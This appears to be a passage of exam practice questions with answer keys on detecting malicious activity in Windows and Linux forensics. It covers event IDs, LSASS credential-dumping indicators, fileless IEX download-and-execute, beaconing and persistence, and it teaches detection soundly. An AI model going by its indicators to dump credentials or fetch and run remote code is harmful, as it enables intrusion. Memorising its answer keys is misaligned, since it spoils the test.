The trap here is treating a single successful login as benign without correlating it to the preceding failure burst and the privileged change that follows.

28
MCQmedium

Which log category should an analyst examine to identify a potential 'Pass-the-Hash' attack?

A.System event logs for service failures.
B.Security event logs for Event ID 4624.
C.Application event logs for crash dumps.
D.DNS query logs from the domain controller.
AnswerB

Event ID 4624 captures successful logons. During a Pass-the-Hash attack, the analyst looks for anomalous authentication patterns, such as the use of NTLM for logons that should be Kerberos, or logins occurring from systems that do not usually communicate with the target, indicating the reuse of intercepted hashes.

Why this answer

Pass-the-Hash attacks involve an attacker using an NTLM hash to authenticate as a user without the cleartext password. This typically manifests in the Security event log during the authentication process. By looking for specific logon types and unusual source-to-destination authentication flows, analysts can detect when a hash has been reused across the network, even if the attacker never obtained the actual password through brute force or phishing.

Exam trap

Candidates mistakenly focus on generic login failures (4625) rather than successful logins (4624). Pass-the-Hash relies on valid authentication using a captured hash, so it appears as a successful logon event.

29
MCQhard

An analyst is reviewing a Windows Server 2019 host and finds that a scheduled task named 'MicrosoftEdgeUpdateTaskMachineUA' exists under Task Scheduler Library\Microsoft\EdgeUpdate. The task's action launches 'C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe' with the argument '/ua', and the task's XML shows it was created by 'NT AUTHORITY\SYSTEM'. The XML file in C:\Windows\System32\Tasks was last modified three months ago, matching the install date of Edge. Which assessment is MOST accurate?

A.The task appears legitimate, but the analyst should verify the binary's digital signature and compare the creation timestamp against the Edge installation baseline.
B.The task is definitely a persistence mechanism because it runs at logon and uses the '/ua' switch, which is undocumented.
C.The task is malicious persistence because SYSTEM-created tasks in the Microsoft namespace are not legitimate.
D.The task is suspicious because the executable path uses the 'Program Files (x86)' directory on a 64-bit server.
AnswerA

All observed attributes — namespace, executable path, argument, owner, and timestamp — align with a standard Edge updater installation. Because scheduled tasks are a common persistence mechanism, best practice is to confirm the binary is signed by Microsoft and that the timestamp matches the known Edge install baseline. This combination of corroboration supports a benign classification while still applying forensic rigor.

Why this answer

Every attribute of the task — its folder, name, executable, argument, owner, and modification time — is consistent with the Edge updater installed on the server. Scheduled tasks are nonetheless a popular persistence vector, so the correct posture is to corroborate with signature verification and timestamp comparison against the known Edge installation baseline before clearing it.

Exam trap

The trap here is treating the presence of a SYSTEM-owned scheduled task in a Microsoft vendor namespace as inherently suspicious, when this is exactly how legitimate vendor updaters are deployed.

30
MCQhard

Refer to the exhibit. What is the most critical security concern presented by the second command line?

A.The usage of the 'echo' command.
B.The usage of 'IEX' to execute code in memory.
C.The creation of a text file in C:\Users\Public.
D.The command uses the 'hidden' window flag.
AnswerB

Invoke-Expression (IEX) allows PowerShell to execute strings as commands. Downloading a script from a URL and piping it to IEX is a common 'fileless' attack technique. This avoids writing the malicious script to disk, making it difficult for traditional file-based antivirus to detect or analyze the payload.

Why this answer

The command performs an 'In-Process' download and execution of a remote PowerShell script. By using 'IEX' (Invoke-Expression) combined with a web client download, the attacker executes the script directly in memory, bypassing the need to write a file to disk. This is a highly effective evasion technique that leaves minimal forensic footprint and is a standard delivery method for sophisticated, memory-resident malware payloads.

Exam trap

Candidates focus on the URL or the PowerShell process itself rather than the 'IEX' (Invoke-Expression) cmdlet. IEX is the specific mechanism that enables fileless, memory-resident execution of remote code.

31
MCQeasy

An analyst observes a high volume of '4625' events for a single user account. What does this indicate and what is the appropriate initial response?

A.Indicates a successful system update; no action required.
B.Indicates a brute-force attack; lock the account and investigate.
C.Indicates a malware infection; format the hard drive.
D.Indicates a network failure; check the cabling.
AnswerB

A high volume of 4625 events signifies repeated failed authentication attempts, which is the textbook definition of a brute-force or password-spraying attack. Locking the account and investigating the source IP is the standard and necessary incident response procedure to mitigate the risk of credential compromise in this scenario.

Why this answer

Event ID 4625 indicates failed logon attempts. A high volume often suggests a brute-force or password-spraying attack. The immediate response should be to isolate the account and investigate the source of the failures to prevent unauthorized access.

This is a baseline security operation that every analyst must perform, as it is the most common indicator of credential-based attacks currently plaguing enterprise network environments.

Exam trap

Test-takers frequently mistake Event ID 4625 for successful logons or treat it purely as an informational alert, overlooking the critical need for immediate containment like account locking.

32
MCQmedium

When reviewing Windows Event Logs, which event ID indicates that a user has successfully performed an interactive login, and why is this critical for identifying unauthorized lateral movement?

A.Event ID 4688, because it tracks the exact time of user authentication.
B.Event ID 4624, because it captures the logon type and source workstation.
C.Event ID 4720, because it logs user account creation activity.
D.Event ID 4625, because it confirms the user has successfully bypassed MFA.
AnswerB

Event ID 4624 provides the critical context of how the user logged in, specifically via the Logon Type field. This allows investigators to differentiate between local interactive sessions and remote network sessions, which is essential for identifying unauthorized lateral movement across the domain during an incident investigation.

Why this answer

Event ID 4624 is the primary indicator of a successful logon. Analyzing Logon Type 2 (interactive) or Logon Type 10 (Remote Desktop) allows analysts to track user access patterns. Monitoring these events helps distinguish between routine administrative access and abnormal logins occurring at odd hours or from unusual source IPs, which are standard red flags for compromised credentials being used by threat actors to traverse the network.

Exam trap

Candidates often confuse Event ID 4624 with 4625 (failed login). 4624 is for successful logins, which is the only way to confirm an attacker has actually accessed the system.

33
Multi-Selecthard

An analyst is investigating a suspected credential dumping incident on a Windows Server 2016 domain controller. The analyst has acquired a memory image and the Windows event logs. Which TWO of the following artifacts would provide the most direct evidence that LSASS memory was accessed for credential theft? (Choose two.)

Select 2 answers
A.Windows Security event ID 4672 indicating special privileges assigned to a new logon for a service account.
B.Sysmon event ID 10 (ProcessAccess) where the target process is lsass.exe and the granted access includes 0x1010 or 0x1410.
C.Windows Security event ID 4688 with process creation for a known credential dumping tool, including its command line.
D.Presence of a memory dump file named lsass.dmp in a user-writable directory, with a corresponding Sysmon event ID 11 (FileCreate).
E.Windows Security event ID 4624 logon type 3 (network) from a workstation to the domain controller.
AnswersB, D

Sysmon event ID 10 logs process access events. When the target is lsass.exe and the granted access mask includes rights like PROCESS_VM_READ and PROCESS_QUERY_INFORMATION (commonly 0x1010 or 0x1410), it strongly indicates an attempt to read LSASS memory, which is a hallmark of credential dumping tools such as Mimikatz.

Why this answer

Sysmon ProcessAccess events targeting lsass.exe with access masks like 0x1010 or 0x1410 directly show attempts to read LSASS memory, which is central to credential dumping. Similarly, an lsass.dmp file created in a user-writable directory with a corresponding file creation event provides concrete evidence of memory dumping. Both artifacts are high-fidelity indicators of credential theft.

Exam trap

The trap here is focusing on process creation or logon events, which are indirect, instead of the direct memory access and dump file artifacts that prove LSASS was targeted.

34
MCQmedium

An analyst is reviewing a memory dump from a Windows 10 system using Volatility 3. The analyst runs 'vol.py -f memory.dmp windows.netscan' and observes a TCP connection with a state of 'ESTABLISHED' between the local IP 10.0.0.5:49152 and a remote IP 203.0.113.45:443. The process associated with this connection is 'chrome.exe' (PID 1234). Which of the following should the analyst do next to determine if this connection is malicious?

A.Check the system's DNS cache for the remote IP to see if it resolves to a known domain, which would confirm whether the connection is benign.
B.Immediately block the remote IP at the firewall and terminate the chrome.exe process, as an established connection to an external IP on port 443 is highly suspicious.
C.Correlate the remote IP with threat intelligence feeds and examine the process memory for injected code or unusual strings.
D.Run 'vol.py -f memory.dmp windows.dlllist --pid 1234' to list all loaded DLLs and check for any unsigned or suspicious modules.
AnswerC

The connection is from a legitimate process (chrome.exe) to a remote IP on port 443, which is common for HTTPS traffic. However, malware can inject into legitimate processes or use them to communicate with command-and-control servers. Correlating the IP with threat intelligence and examining the process memory for anomalies (e.g., injected code, suspicious strings) is the logical next step to determine if the connection is malicious. This approach balances the need to investigate without assuming benign or malicious.

Why this answer

When a network connection from a legitimate process like chrome.exe is observed, it is not inherently malicious. The analyst must gather more evidence. Correlating the remote IP with threat intelligence can indicate if it is known malicious.

Examining the process memory for injected code or unusual strings can reveal if the process has been compromised. This combination provides a stronger basis for determining the nature of the connection.

Exam trap

The trap here is assuming that a connection from a known legitimate process to an external IP on port 443 is automatically benign, or conversely, immediately malicious; both assumptions are premature without further investigation.

35
MCQmedium

Which log artifact provides the most reliable evidence that a user account was used for an interactive remote login rather than a scheduled task?

A.Event ID 4624 with Logon Type 10.
B.Event ID 4672 during the authentication process.
C.Event ID 4648 involving the use of explicit credentials.
D.Event ID 4720 occurring at the same time.
AnswerA

Logon Type 10 is the specific identifier for Remote Interactive logins, typically associated with RDP connections. This is the primary forensic artifact used to distinguish human-driven remote access from automated system tasks or background service authentication, which use different logon types within the Windows event auditing subsystem.

Why this answer

The Windows Security Event log captures specific Logon Types that categorize the nature of the authentication. Logon Type 2 denotes an interactive local login, while Type 10 identifies Remote Interactive (RDP) sessions. Scheduled tasks typically utilize Type 4 (Batch) or Type 5 (Service), allowing analysts to differentiate between user-driven activity and automated system processes through forensic inspection of the event data.

Exam trap

Examinees often confuse interactive remote RDP sessions (Logon Type 10) with standard local interactive logins (Logon Type 2) or network services.

36
Multi-Selectmedium

An analyst is reconstructing a suspected credential-dumping incident on a Windows 10 host and has already imaged memory. Which TWO artifacts should the analyst examine to determine whether the LSASS process memory was accessed by an unauthorized tool? (Choose two.)

Select 2 answers
A.Prefetch files showing that the Windows Credential Manager UI was launched by the user.
B.A memory image search for the 'sekurlsa' module strings and Mimikatz driver artifacts in non-paged pool.
C.Security Event ID 4688 process creation records showing the parent image of every long-running service.
D.Sysmon Event ID 10 records showing a process opening lsass.exe with GrantedAccess 0x1010 or 0x1410.
E.Amcache entries listing hashes of binaries installed under 'Program Files' on the host.
AnswersB, D

Residues of credential-dumping frameworks such as the sekurlsa module strings or the Mimikatz kernel driver can persist in memory after execution and are recoverable from a full memory capture. Finding them demonstrates the tooling was present and loaded on the host, which corroborates that LSASS memory was targeted even if the dumping process has already exited.

Why this answer

Establishing unauthorized LSASS access requires artifacts that either record the access event itself or demonstrate the presence of credential-dumping tooling. Sysmon process-access events capture the target process, requesting image, and granted access mask, while memory-resident strings and driver artifacts left by frameworks like Mimikatz show the tooling was loaded. Together they provide both the access event and the capability evidence.

Exam trap

The trap here is reaching for execution-history artifacts like Prefetch or Amcache, which prove a binary ran but say nothing about who opened LSASS memory or with what access mask.

37
MCQeasy

A forensic analyst is reviewing Windows Security event logs to identify potential malicious activity. The analyst notices a series of Event ID 4625 (An account failed to log on) followed by Event ID 4624 (An account was successfully logged on) for the same user account within a short period. What is the most likely explanation for this pattern?

A.The account is locked out and requires administrative intervention to unlock.
B.The system is experiencing a denial-of-service attack due to excessive failed logons.
C.An attacker has successfully brute-forced the user's password after multiple attempts.
D.The user mistyped their password several times before successfully logging in.
AnswerD

Multiple failed logon attempts followed by a successful logon for the same account often indicate a user who forgot their password or made typographical errors. While this could also indicate a brute-force attack, the pattern alone without other indicators (like many different accounts or high volume) is most consistent with normal user error.

Why this answer

The correct answer identifies that a few failed logons followed by a success are commonly caused by a user mistyping their password. This pattern is benign in isolation. Analysts should consider context, such as the number of attempts and source of logons, to differentiate from brute-force attacks.

Exam trap

The trap here is immediately assuming malicious brute-force activity without considering the volume and context of the failed attempts.

38
Multi-Selecthard

A forensic analyst is triaging a Windows 10 endpoint that is suspected of being part of a botnet. The analyst has collected the Security, System, and Application event logs, the Sysmon operational log, and a live memory image. Which TWO of the following artifacts would provide the most direct evidence of periodic command-and-control beaconing behavior? (Choose two.)

Select 2 answers
A.Application Event ID 1000 (Application Error) entries referencing a crashing service.
B.System Event ID 7045 (A service was installed in the system) recorded once during the investigation window.
C.Sysmon Event ID 3 (NetworkConnect) entries showing repeated connections to the same external IP at regular intervals.
D.Security Event ID 4624 (An account was successfully logged on) with Logon Type 3 repeated every few minutes.
E.Sysmon Event ID 22 (DNSEvent) entries showing queries to the same domain at consistent time intervals.
AnswersC, E

Sysmon Event ID 3 records outbound network connections with process, source, destination, and port details. Repeated connections to the same external IP at consistent intervals are a hallmark of beaconing and directly evidence command-and-control traffic. Correlating the initiating process image and its hash strengthens the finding, making this one of the most direct artifacts for confirming periodic C2 behavior from the endpoint itself.

Why this answer

Beaconing is characterized by repeated, regular communication from a host to an external controller. Sysmon network-connect events and DNS query events both capture the timing, destination, and initiating process needed to confirm that pattern directly from the endpoint. Logon, application-crash, and service-install events may support the broader investigation but do not, by themselves, demonstrate periodic outbound C2 traffic.

Exam trap

The trap here is equating any recurring logon or service event with beaconing, when beaconing specifically requires repeated network or DNS activity tied to a process over time.

39
MCQhard

You are analyzing a system and find evidence that a user has executed a PowerShell script that imports the 'Net.WebClient' class. What is the most likely purpose of this script?

A.To perform local file system encryption for data backup.
B.To download and execute a remote payload from a C2 server.
C.To monitor the system for unauthorized network connections.
D.To clear the Windows Event Logs to hide tracks.
AnswerB

The 'Net.WebClient' class is the standard, built-in way for PowerShell scripts to perform HTTP or HTTPS GET/POST requests to download remote data. In incident response, the presence of this class in a script is a strong indicator of a download-and-execute operation used by attackers to pull secondary malicious payloads.

Why this answer

The 'Net.WebClient' class in .NET is frequently used in PowerShell to download remote content. In a forensic context, it is a hallmark of download-and-execute malware. Attackers use this to fetch secondary payloads from C2 servers.

Identifying this class usage is critical for characterizing the scope of an attack, as it explains how the initial stub on the system was used to pull down more complex malicious tools.

Exam trap

Examinees sometimes misinterpret .NET class imports as benign software development activity instead of recognizing them as standard living-off-the-land download mechanisms.

40
MCQhard

What is the primary forensic value of examining MFT (Master File Table) $Standard_Information vs $File_Name attributes?

A.SI attributes are updated by the OS, while FN attributes are static.
B.Discrepancies often reveal timestomping attempts by attackers.
C.FN attributes are the only way to recover deleted files.
D.SI attributes are required for NTFS file permissions.
AnswerB

Attackers frequently modify the SI attributes to make malicious files appear older or consistent with other system files. Because they often overlook the FN attributes, comparing the two reveals the manipulation. This discrepancy is a standard forensic indicator used to identify hidden files that were created or modified maliciously.

Why this answer

The MFT contains two primary timestamps for each file: Standard Information (SI) and File Name (FN). Attackers often use 'timestomping' tools to modify the SI attributes to match legitimate files and hide their tracks. However, they frequently forget or are unable to modify the FN attributes, which are less accessible.

Discrepancies between these timestamps are a definitive indicator of anti-forensic activity that analysts use to uncover hidden malicious file creation times.

Exam trap

Candidates often assume that the MFT always reflects the true file creation time. They fail to realize that attackers frequently target the Standard Information attribute while neglecting the File Name attribute.

41
MCQeasy

A forensic analyst is reviewing a Windows 10 system and finds that a scheduled task named 'Updater' was created to run a PowerShell script every hour. The task's action is powershell.exe -WindowStyle Hidden -EncodedCommand <base64>. The task was created by a user account that normally does not perform administrative tasks. Which of the following best describes the forensic significance of this finding?

A.This is likely a legitimate software update mechanism, as many applications use scheduled tasks with hidden PowerShell for silent updates.
B.The task is likely a red herring because scheduled tasks cannot execute PowerShell scripts without administrative privileges.
C.The use of -EncodedCommand is a common obfuscation technique to hide malicious PowerShell code, and together with the hidden window and unusual creator, this strongly indicates persistence.
D.The scheduled task is benign because it runs every hour, which is a common interval for legitimate system maintenance tasks.
AnswerC

Attackers frequently use -EncodedCommand to obfuscate PowerShell payloads, and -WindowStyle Hidden to avoid detection. A scheduled task created by a non-administrative user that runs such a command hourly is a classic persistence mechanism. This finding warrants immediate investigation of the encoded command and the task's origin.

Why this answer

The combination of a scheduled task running PowerShell with an encoded command, a hidden window, and creation by a non-administrative user is a strong indicator of malicious persistence. Attackers use encoded commands to evade detection and scheduled tasks to maintain execution. This should be investigated by decoding the command and examining the task's XML for further clues.

Exam trap

The trap here is dismissing the finding because scheduled tasks are common, without recognizing that the specific flags and unusual creator account elevate it to a high-priority indicator of compromise.

42
MCQeasy

An analyst is triaging a Linux server and finds a process whose /proc/<pid>/exe symlink points to /tmp/.kwork, and whose parent process is the legitimate cron daemon. The file is owned by root but has no package ownership record. Which interpretation is most appropriate?

A.The process is likely malicious persistence launched by cron from a non-standard, unmanaged path.
B.This is a legitimate kernel worker thread that cron spawned during routine maintenance.
C.The process is a normal systemd service that was forked by cron after a unit reload.
D.The process is a containerized workload placed in /tmp by the container runtime.
AnswerA

A root-owned executable in /tmp that is not tracked by the package manager and is parented by cron strongly suggests an attacker added a cron entry to execute a dropped binary. The name mimics a kernel worker to blend in, but kernel threads lack disk executables. The combination of location, ownership, parent, and missing package record makes a malicious interpretation the most defensible.

Why this answer

An unmanaged root-owned binary in /tmp executed by cron indicates an attacker added a scheduled job to launch a dropped payload. The kernel-thread-style name is a masquerade, since real kernel threads have no on-disk executable. Investigators should dump the crontab entries, hash the binary, and review /var/log/cron and auth logs for the insertion window.

Exam trap

The trap here is trusting the process name, because an attacker can name a binary to mimic a kernel worker while the executable path and package status reveal it is not legitimate.

43
MCQeasy

A forensic analyst is reviewing a Windows 10 system suspected of being infected with malware that maintains persistence. The analyst notices a new service named 'Windows Update Helper' with a binary path pointing to C:\Users\Public\updater.exe. The service is set to start automatically. Which artifact would best confirm that this service was created recently and is not a legitimate Windows service?

A.The NTFS $MFT, checking the timestamps of the updater.exe file in C:\Users\Public.
B.The SYSTEM registry hive, specifically the LastWrite time of the service key under HKLM\SYSTEM\CurrentControlSet\Services.
C.The Amcache.hve file, checking for the service binary path under the Root\InventoryApplicationFile key.
D.The Security event log, looking for event ID 4697 (A service was installed in the system).
AnswerB

The LastWrite time of a registry key indicates when the key was last modified. For a newly created service, the LastWrite time of its key in the SYSTEM hive will reflect the creation or last modification time. If this time correlates with the suspected infection window and the service binary is in a user-writable directory, it strongly suggests the service is malicious. Legitimate Windows services typically have older, consistent LastWrite times.

Why this answer

The LastWrite time of the service's registry key in the SYSTEM hive provides a direct timestamp for when the service configuration was last modified, which for a newly created service correlates with its installation. This artifact is stored locally and does not depend on audit policies. Other options either require non-default auditing, do not record service creation, or reflect file activity rather than service configuration.

Exam trap

The trap here is relying on event ID 4697 for service installation evidence, but that event is only generated when a non-default audit policy is enabled, so it may be absent.

Ready to test yourself?

Try a timed practice session using only Identification Of Malicious And Normal Activity questions.